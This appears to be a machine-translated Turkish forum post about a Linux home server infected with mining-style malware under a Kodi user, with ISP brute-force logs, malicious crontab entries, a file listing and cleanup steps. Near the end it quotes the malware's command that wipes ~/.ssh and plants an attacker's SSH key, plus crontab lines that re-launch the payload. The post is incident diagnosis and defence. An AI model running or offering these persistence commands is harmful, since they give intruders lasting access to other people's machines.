Son zamanlarda ev sunucumun acı çekmeye başladığını fark ettim. Tüm kaynaklar iki süreçle yenildi: crond64
ve tsm
. Onları defalarca öldürmeme rağmen tekrar tekrar ortaya çıktılar.
Aynı zamanda, ISS'm IP adresimden kaynaklanan bir kötüye kullanım hakkında beni bilgilendiriyordu:
==================== Excerpt from log for 178.22.105.xxx====================
Note: Local timezone is +0100 (CET)
Jan 28 20:55:44 shared06 sshd[26722]: Invalid user admin from 178.22.105.xxx
Jan 28 20:55:44 shared06 sshd[26722]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=178.22.105.xxx
Jan 28 20:55:45 shared06 sshd[26722]: Failed password for invalid user admin from 178.22.105.xxx port 33532 ssh2
Jan 28 20:55:46 shared06 sshd[26722]: Received disconnect from 178.22.105.xxx port 33532:11: Bye Bye [preauth]
Jan 28 20:55:46 shared06 sshd[26722]: Disconnected from 178.22.105.xxx port 33532 [preauth]
Jan 28 21:12:05 shared06 sshd[30920]: Invalid user odm from 178.22.105.xxx
Jan 28 21:12:05 shared06 sshd[30920]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=178.22.105.xxx
Jan 28 21:12:07 shared06 sshd[30920]: Failed password for invalid user odm from 178.22.105.xxx port 45114 ssh2
Jan 28 21:12:07 shared06 sshd[30920]: Received disconnect from 178.22.105.xxx port 45114:11: Bye Bye [preauth]
Jan 28 21:12:07 shared06 sshd[30920]: Disconnected from 178.22.105.xxx port 45114 [preauth]
Bu web sitesi tarafından virüs bulaşmış olabilir. Tüm sabit diskimi tarayarak Sophos AV'yi çalıştırıyorum ve gerçekten de bazı virüsler buldu /tmp/.mountfs/.rsync
. Bu yüzden tüm klasörü sildim ve bunun olduğunu düşündüm. Ama daha sonra geri gelmeye devam etti. Sonra kullanıcı cron dosyasını kontrol ettim /var/spool/cron/crontabs/kodi
(virüs medya sunucumun kodi kullanıcısını kullanarak çalışıyordu), şöyle görünüyordu:
# DO NOT EDIT THIS FILE - edit the master and reinstall.
# (cron.d installed on Sun Feb 3 21:52:03 2019)
# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
* */12 * * * /home/kodi/.ttp/a/upd>/dev/null 2>&1
@reboot /home/kodi/.ttp/a/upd>/dev/null 2>&1
5 8 * * 0 /home/kodi/.ttp/b/sync>/dev/null 2>&1
@reboot /home/kodi/.ttp/b/sync>/dev/null 2>&1
#5 1 * * * /tmp/.mountfs/.rsync/c/aptitude>/dev/null 2>&1
Görünüşe göre, virüs başka bir dizinden arada bir kendini yeniden etkinleştiriyor. Bu dizinin içeriği:
>>> ls /home/kodi/.ttp/*
/home/kodi/.ttp/cron.d /home/kodi/.ttp/dir2.dir
/home/kodi/.ttp/a:
a bash.pid config.txt crond32 crond64 cronda crondb dir.dir pools.txt run stop upd
/home/kodi/.ttp/b:
a dir.dir rsync run stop sync
/home/kodi/.ttp/c:
aptitude dir.dir go ip lib n p run slow start stop tsm tsm32 tsm64 v watchdog
Tüm bu dosyaları ve crontab'daki girişleri sildim ve bununla umut, sorun çözüldü. Ancak, bunun hangi virüs olduğunu, onu nasıl yakalamış olabileceğimi (Kodi'ye bağlı olabilir) ve bunu önlemek için neler yapabileceğimi merak ediyorum. Neyse ki, sadece sınırlı haklara sahip bir kullanıcıdan geliyordu, ancak yine de başa çıkmak can sıkıcıydı.
DÜZENLE
Görünüşe göre bu virüsün tüm kalıntılarını kaldırdım (ayrıca tüm tmp klasörünü de kaldırdım), virüs geri gelmeye devam etti. ~/.ssh/authorized_hosts
Kesinlikle kendim koymadığım bir giriş olduğunu fark ettim . Bu, virüsün tekrar tekrar nasıl yeniden ekilebileceğini açıklar. Girişi kaldırdım, bu kullanıcı için girişi devre dışı bıraktım, şifre girişini devre dışı bıraktım (yalnızca şifre) ve şimdi standart olmayan bir bağlantı noktası kullandım.
Ayrıca sunucumda rasgele kullanıcı adları ile tekrar tekrar giriş denemeleri fark ettim, muhtemelen bir çeşit bot tarafından (günlük IP adresimden başlatılana şaşırtıcı bir şekilde benziyordu, bana ISS'm tarafından gönderildi). İlk başta bilgisayarıma bu şekilde bulaştı sanırım.
cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB... ...VKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod 700 .ssh && cd .ssh && chmod 600 authorized_keys && cd ~
. Sadece cp /etc/skel/.bashrc /home/mycompromiseduser/
kaldırmak için bir yaptım .